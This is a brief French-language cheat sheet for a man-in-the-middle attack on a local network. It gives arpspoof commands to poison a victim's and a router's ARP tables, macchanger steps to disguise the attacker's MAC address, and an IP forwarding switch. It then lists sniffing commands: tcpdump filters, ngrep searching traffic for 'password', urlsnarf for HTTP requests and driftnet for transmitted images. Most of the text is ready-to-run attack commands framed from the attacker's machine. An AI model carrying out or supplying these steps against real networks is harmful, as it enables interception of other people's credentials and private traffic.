ARP spoofing. arpspoof est inclus dans le package dsniff
# arpspoof -t 10.5.23.42 10.5.23.1 (modifier la table arp de la machine 10.5.23.42)
# arpspoof -t 10.5.23.1 10.5.23.42 (modifier la table arp du routeur)
Sur la machine de l’attaquant (pour faire suivre le paquet au bon mac adress, notre table arp n`est pas corrompu). Aussi, obtenir une mac address temporaire
# ifconfig wlan1 down
# macchanger -r wlan1
# ifconfig wlan1 up
# echo 1 > /proc/sys/net/ipv4/ip_forward
Un outil graphique : ettercap -G
Voir le cache ARP
# ip neigh
Effacer le cache ARP
# ip neigh flush all
Sniffer le traffic réseau:
# tcpdump [options] [filters]
Quelques options de tcpdump
- -i interface : l’interface ou any pour tous les interfaces
- -n : désactive la résolution des noms et ports
- -A : imprime au format ASCII
- -XX : imprime au format hexadécimal et ASCII
- -w file : enregistre le fichier pcap dans file
- -r file : lit le fichier PCAP
Quelques filtres pour tcpdump
- not arp : pas de paquets ARP
- port ftp or port 23 : Seulement les ports 21 ou 23
- host 192.168.2.33 : Seulement à partir/vers l’hôte
- net 10.10.10.0/24 : Seulement à partir/vers les ordinateurs faisant partie du sous-réseau
Capture des paquets sur un ordinateur éloigné via SSH
# ssh 192.168.2.2 tcpdump -w- port not ssh | wireshark -k -i -
Recherche dans du traffic réseau
# ngrep password
Montre les requêtes HTTP GET
# urlsnarf
Montre les images transmises
# driftnet